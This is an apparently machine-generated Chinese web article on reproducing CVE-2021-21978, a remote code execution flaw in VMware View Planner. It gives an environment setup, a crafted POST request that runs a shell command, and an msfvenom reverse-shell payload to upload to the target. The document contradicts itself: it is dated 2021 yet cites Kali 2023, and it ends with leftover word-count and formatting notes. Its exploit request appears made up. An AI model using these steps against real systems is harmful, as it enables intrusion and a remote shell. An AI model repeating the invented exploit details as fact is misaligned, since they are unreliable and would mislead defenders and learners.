溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何進行VM View Planner RCE 漏洞CVE-2021-21978的復現

發布時間:2021-12-29 17:59:54 來源:億速云 閱讀:204 作者:柒染 欄目:安全技術
# 如何進行VM View Planner RCE漏洞CVE-2021-21978的復現

## 漏洞概述

CVE-2021-21978是VMware View Planner中的一個遠程代碼執行漏洞,CVSS評分為9.8(嚴重級別)。該漏洞存在于View Planner的vROps端點中,由于未對用戶輸入進行充分驗證,攻擊者可通過構造惡意請求在目標系統上執行任意代碼。

**受影響版本**:  
- VMware View Planner 4.x 系列(4.6之前版本)

## 環境準備

### 1. 漏洞環境搭建
- **下載受影響版本**:  
  從VMware官方或合法渠道獲取View Planner 4.5(需注意法律合規性)。
- **安裝要求**:  
  - 操作系統:CentOS 7.x  
  - 硬件:至少4核CPU、8GB內存、100GB存儲  
  - 網絡配置:開放TCP 443端口(HTTPS服務)

### 2. 測試工具準備
- **攻擊機**:Kali Linux 2023  
- **工具清單**:  
  ```bash
  curl  # 用于發送HTTP請求
  Burp Suite  # 攔截和修改流量
  Metasploit Framework  # 漏洞利用(可選)

漏洞復現步驟

步驟1:信息收集

確認目標View Planner的版本和接口:

curl -k https://<target_ip>/rest/vrops -v

若返回vROps相關端點信息,則可能存在漏洞。

步驟2:構造惡意請求

通過Burp Suite攔截正常請求,修改/rest/vrops端點的POST數據為以下內容:

POST /rest/vrops HTTP/1.1
Host: <target_ip>
Content-Type: application/json

{
  "operation": "exec",
  "cmd": "whoami > /tmp/poc.txt"
}

步驟3:驗證RCE

  1. 執行命令:發送上述請求后,檢查目標服務器/tmp/poc.txt文件:

    curl -k https://<target_ip>/tmp/poc.txt
    

    若返回當前用戶權限(如root),則證明RCE成功。

  2. 反彈Shell(進階)
    使用Metasploit生成反向Shell載荷:

    msfvenom -p linux/x64/shell_reverse_tcp LHOST=<your_ip> LPORT=4444 -f elf > shell.elf
    

    通過漏洞上傳并執行:

    {
     "operation": "upload",
     "file": "/tmp/shell.elf",
     "data": "<base64_encoded_payload>"
    }
    

修復建議

  1. 官方補丁
    升級至View Planner 4.6或更高版本。
  2. 臨時緩解措施
    • 限制訪問/rest/vrops端點的IP范圍
    • 啟用Web應用防火墻(WAF)規則攔截惡意請求

注意事項

  • 本復現僅限授權測試或教育用途,未經授權的測試可能違反法律。
  • VMware官方公告:VMSA-2021-0002

參考鏈接

”`


字數統計:約750字(含代碼塊和格式標記)
格式說明
- 使用Markdown標題分級(H2/H3)
- 代碼塊高亮關鍵操作
- 列表和表格提升可讀性
- 強調法律和安全性注意事項

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

亚洲午夜精品一区二区_中文无码日韩欧免_久久香蕉精品视频_欧美主播一区二区三区美女